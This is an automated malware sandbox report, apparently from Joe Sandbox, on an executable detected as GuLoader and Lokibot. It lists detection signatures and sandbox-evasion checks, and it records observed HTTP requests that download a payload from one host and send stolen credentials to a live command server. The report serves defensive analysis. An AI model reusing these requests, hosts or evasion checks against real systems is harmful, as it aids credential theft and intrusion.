Windows Analysis Report
SC_TR11670000.exe

Overview

General Information

Sample Name: SC_TR11670000.exe
Analysis ID: 828467
MD5: 778f9f61191bf812a829edfb93f5b442
SHA1: 20f3e834b759252210d047091bc98c47e7e6ffdd
SHA256: 47b5e835d443cde52de78c36998cf1e312d391501226238ea00968139790e32d
Infos:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SC_TR11670000.exe Virustotal: Detection: 47% Perma Link
Source: SC_TR11670000.exe ReversingLabs: Detection: 51%
Antivirus detection for URL or domain
Source: http://171.22.30.147/flowe/five/fre.php Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: zed-unusual-activity-com.veldaeffertz.ml Virustotal: Detection: 6% Perma Link
Uses 32bit PE files
Source: SC_TR11670000.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.11.20:49841 version: TLS 1.2
Source: SC_TR11670000.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: SC_TR11670000.exe, 00000004.00000001.24088641658.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: mshtml.pdbUGP source: SC_TR11670000.exe, 00000004.00000001.24088641658.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_0040626D FindFirstFileA,FindClose, 1_2_0040626D
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 1_2_00405732
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_004026FE FindFirstFileA, 1_2_004026FE

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49842 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49842 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49842 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49842 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49842 -> 171.22.30.147:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 171.22.30.147 171.22.30.147
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /CodkZc57.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zed-unusual-activity-com.veldaeffertz.mlCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /flowe/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FC5E27AContent-Length: 178Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown TCP traffic detected without corresponding DNS query: 171.22.30.147
Source: unknown TCP traffic detected without corresponding DNS query: 171.22.30.147
Source: unknown TCP traffic detected without corresponding DNS query: 171.22.30.147
Source: unknown TCP traffic detected without corresponding DNS query: 171.22.30.147
Source: unknown TCP traffic detected without corresponding DNS query: 171.22.30.147
Source: unknown TCP traffic detected without corresponding DNS query: 171.22.30.147
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SC_TR11670000.exe, 00000004.00000003.24262321810.000000000760C000.00000004.00000020.00020000.00000000.sdmp, SC_TR11670000.exe, 00000004.00000003.24248619646.000000000760C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: SC_TR11670000.exe, 00000004.00000003.24262321810.000000000760C000.00000004.00000020.00020000.00000000.sdmp, SC_TR11670000.exe, 00000004.00000003.24248619646.000000000760C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: SC_TR11670000.exe, 00000004.00000001.24088641658.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: SC_TR11670000.exe, SC_TR11670000.exe, 00000001.00000000.23291984818.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC_TR11670000.exe, 00000001.00000002.24270690849.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC_TR11670000.exe, 00000004.00000000.24087597436.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SC_TR11670000.exe, 00000001.00000000.23291984818.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC_TR11670000.exe, 00000001.00000002.24270690849.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC_TR11670000.exe, 00000004.00000000.24087597436.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: SC_TR11670000.exe, 00000004.00000001.24088641658.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: SC_TR11670000.exe, 00000004.00000001.24088641658.0000000000626000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: SC_TR11670000.exe, 00000004.00000001.24088641658.00000000005F2000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: SC_TR11670000.exe, 00000004.00000001.24088641658.00000000005F2000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: SC_TR11670000.exe, 00000004.00000001.24088641658.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: SC_TR11670000.exe, 00000004.00000003.24249648061.00000000375DA000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000.exe, 00000004.00000003.24249648061.00000000375D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: SC_TR11670000.exe, 00000004.00000003.24249648061.00000000375DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: SC_TR11670000.exe, 00000004.00000003.24249648061.00000000375DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: SC_TR11670000.exe, 00000004.00000003.24249648061.00000000375DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown HTTP traffic detected: POST /flowe/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FC5E27AContent-Length: 178Connection: close
Source: unknown DNS traffic detected: queries for: zed-unusual-activity-com.veldaeffertz.ml
Source: global traffic HTTP traffic detected: GET /CodkZc57.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zed-unusual-activity-com.veldaeffertz.mlCache-Control: no-cache
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.11.20:49841 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_004051CF
Uses 32bit PE files
Source: SC_TR11670000.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
One or more processes crash
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 212
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004031D6
Detected potential crypto function
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_00404A0E 1_2_00404A0E
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_004065F6 1_2_004065F6
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_73EC1A9C 1_2_73EC1A9C
Sample file is different than original file name gathered from version info
Source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs SC_TR11670000.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\SC_TR11670000.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Section loaded: edgegdi.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: SC_TR11670000.exe Static PE information: invalid certificate
Source: SC_TR11670000.exe Virustotal: Detection: 47%
Source: SC_TR11670000.exe ReversingLabs: Detection: 51%
Source: C:\Users\user\Desktop\SC_TR11670000.exe File read: C:\Users\user\Desktop\SC_TR11670000.exe Jump to behavior
Source: SC_TR11670000.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SC_TR11670000.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SC_TR11670000.exe C:\Users\user\Desktop\SC_TR11670000.exe
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process created: C:\Users\user\Desktop\SC_TR11670000.exe C:\Users\user\Desktop\SC_TR11670000.exe
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 212
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process created: C:\Users\user\Desktop\SC_TR11670000.exe C:\Users\user\Desktop\SC_TR11670000.exe Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004031D6
Source: C:\Users\user\Desktop\SC_TR11670000.exe File created: C:\Users\user\AppData\Roaming\fumigatorium Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe File created: C:\Users\user\AppData\Local\Temp\nsw6A3C.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/19@1/2
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_004020D1 CoCreateInstance,MultiByteToWideChar, 1_2_004020D1
Source: C:\Users\user\Desktop\SC_TR11670000.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 1_2_0040449B
Source: C:\Users\user\Desktop\SC_TR11670000.exe Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
Source: C:\Users\user\Desktop\SC_TR11670000.exe File written: C:\Users\user\AppData\Local\Temp\Kontos.ini Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: SC_TR11670000.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: SC_TR11670000.exe, 00000001.00000003.23295089803.00000000028DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: SC_TR11670000.exe, 00000004.00000001.24088641658.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: mshtml.pdbUGP source: SC_TR11670000.exe, 00000004.00000001.24088641658.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: SC_TR11670000.exe PID: 2852, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.24272353899.0000000003E2A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.23294314112.00000000028DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.24273911659.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.24272353899.0000000003330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Lejningerne\Krugerite.Fri, type: DROPPED
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_73EC2F20 push eax; ret 1_2_73EC2F4E
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_03338B42 pushad ; retf 1_2_03338B48
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_03335941 push eax; ret 1_2_0333594B
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_033383A3 push edx; retf 1_2_033383A6
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_03336BE4 push cs; iretd 1_2_03336BF6
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_03338A2A pushad ; ret 1_2_03338A30
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_03333403 push esi; ret 1_2_03333407
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_03336EA5 pushfd ; retf 1_2_03336EA6
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_73EC1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 1_2_73EC1A9C
Drops PE files
Source: C:\Users\user\Desktop\SC_TR11670000.exe File created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Lejningerne\AEGISIIIRadeonHelper.dll Jump to dropped file
Source: C:\Users\user\Desktop\SC_TR11670000.exe File created: C:\Users\user\AppData\Local\Temp\nss6D2B.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\SC_TR11670000.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\SC_TR11670000.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SC_TR11670000.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Lejningerne\AEGISIIIRadeonHelper.dll Jump to dropped file
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_0040626D FindFirstFileA,FindClose, 1_2_0040626D
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 1_2_00405732
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_004026FE FindFirstFileA, 1_2_004026FE
Source: C:\Users\user\Desktop\SC_TR11670000.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SC_TR11670000.exe API call chain: ExitProcess graph end node
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: SC_TR11670000.exe, 00000001.00000002.24400891966.00000000090B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_73EC1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 1_2_73EC1A9C
Enables debug privileges
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer, 1_2_00402D63
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SC_TR11670000.exe Process created: C:\Users\user\Desktop\SC_TR11670000.exe C:\Users\user\Desktop\SC_TR11670000.exe Jump to behavior
